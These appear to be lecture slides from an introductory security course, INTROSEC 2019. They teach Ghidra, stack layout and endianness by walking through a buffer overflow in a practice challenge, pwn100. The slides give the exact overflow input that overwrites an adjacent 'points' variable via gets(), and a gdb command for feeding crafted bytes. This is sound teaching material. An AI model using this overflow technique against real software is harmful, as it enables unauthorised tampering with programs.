How do programs work?
INTROSEC 2019
Obligatory links
In case you missed it
Tools we will be using (on the vm already)
What is a ghidra
For now Ghidra is just a static analysis platform
The NSA claims a debugger will be integrated soon™
For now we will just use GDB and just sync the two in our heads.
Ghidra 101
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
Ghidra 101
It has a lot of features:
How does a function get its arguments
Each block is 4 bytes of data� (doubleword)
Registers such as ESP and EBP are a doubleword
0x00000000 | ……... |
ESP -----------> | Local Var | param1 |
| Local Var | param2 |
| Local Var | param3 |
| Local Var | param4 |
EBP -----------> | Local Var | param5 |
Previous EBP | |
Return address | |
0xffffffff | ……... |
DEMO TIME?
Stuff you kinda just gotta know
Two hex characters are one byte, so 0x00-0xff are all values in a byte 0-255, 0xffff is 2 bytes…
When displaying bytes it is very common to use hex
All data at the end of the day is just bytes your program can just choose to treat them as ints vs chars etc... or even code…………..
pwn100
Each block is 4 bytes of data� (doubleword)
Chars are 1 byte
Ints are 4 bytes
Registers such as ESP and EBP are a doubleword
0x00000000 | ……... |
ESP -----------> | foo[0:4] |
| foo[4:8] |
| foo[8:12] |
| foo[12:16] |
| foo[16:20] |
| Int points |
EBP -----------> | Local Var | param5 |
pwn100
Let’s improve the disassembly
Name variables by pressing L
……... |
local_28 |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
What do we name them?
Look at how they’re used and just make up something believable
……... |
local_28 |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
Then just press L and rename
(Ghidra closes the graph view to refresh, just re-open it)
……... |
local_28 ⇒ “name” |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
Okay that seems to make sense
Protip: see all uses of a variable by middle clicking it�(Mac users: use a mouse or change it in the settings)
……... |
local_28 ⇒ “name” |
local_24 |
local_20 |
local_1c |
local_18 |
local_14 |
local_10 |
local_c |
......... |
pwn100
Where are 24 → 18?
Ghidra thinks they are part of “name”
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 |
local_10 |
local_c |
......... |
pwn100
local_14?
Looks like the points variable
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 |
local_c |
......... |
pwn100
local_c?
Isn’t used in the stuff we care about
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
pwn100
So the disassembly matches up with our expected stack frame layout
……... |
foo[0:4] |
foo[4:8] |
foo[8:12] |
foo[12:16] |
foo[16:20] |
Int points |
…….. |
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
Back to pwning
So what does this function do?
Back to pwning
How does gets work? Read the manual!
bash$ man gets
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
Back to pwning
So we read bytes into name with no check for buffer overrun...
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
Back to pwning
We gets into name, which is 20 bytes and right below points
……... |
local_28 ⇒ “name”[0:4] |
local_24 ⇒ “name”[4:8] |
local_20 ⇒ “name”[8:12] |
local_1c ⇒ “name”[12:16] |
local_18 ⇒ “name”[16:20] |
local_14 ⇒ “points” |
local_10 ⇒ ¯\_(ツ)_/¯ |
local_c ⇒ ¯\_(ツ)_/¯ |
......... |
Back to pwning
What if we spam the alphabet?
ABCDEFGHIJKLMNOPQRSTUVWXYZ
‘A’ == 0x41 ‘B’ == 0x42 Etc
man ascii
Endianness makes this confusing
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x58 57 56 55 XWVU | local_14 ⇒ “points” |
0x?? ?? 5a 59 ??ZY | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
Back to pwning
So we can set points to whatever we want
What does it need to be?
Check the cmp!
Oh, thanks Ghidra.
Side step to make Ghidra’s UI less bad
Edit the code layout and drag the Operands box
Government-quality UI right here, folks
… back to pwning
So we can set points to whatever we want
What does it need to be?
Check the cmp!
Back to pwning
So points ⇒ 0x1337d00d
Replacing the UVWX with those bytes
Again, endianness: 0d d0 37 13
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x13 37 d0 0d ???? | local_14 ⇒ “points” |
0x?? ?? 5a 59 ??ZY | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
Back to pwning
So our final input is ABCDEFGHIJKLMNOPQRST\x0d\xd0\x37\x13
Time to gdb!
| ……... |
0x44 43 42 41 DCBA | local_28 ⇒ “name”[0:4] |
0x48 47 46 45 HGFE | local_24 ⇒ “name”[4:8] |
0x4c 4b 4a 49 LKJI | local_20 ⇒ “name”[8:12] |
0x50 4f 4e 4d PONM | local_1c ⇒ “name”[12:16] |
0x54 53 52 51 TSRQ | local_18 ⇒ “name”[16:20] |
0x13 37 d0 0d .7Ð. | local_14 ⇒ “points” |
0x?? ?? 5a 59 ??ZY | local_10 ⇒ ¯\_(ツ)_/¯ |
... | local_c ⇒ ¯\_(ツ)_/¯ |
... | ......... |
GDB shows us how it works
Feel free to look at the older slides for how to GDB
Protip: Run python in gdb so you can debug weird input
gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')
^ This spacing is necessary. Thanks, gdb!
Demo
gdb-peda$ run < <(python -c 'print("\x41\x41\x41\x41")')
^ This spacing is necessary. Thanks, gdb!
Demo
Remember branchier from Friday?
Next Steps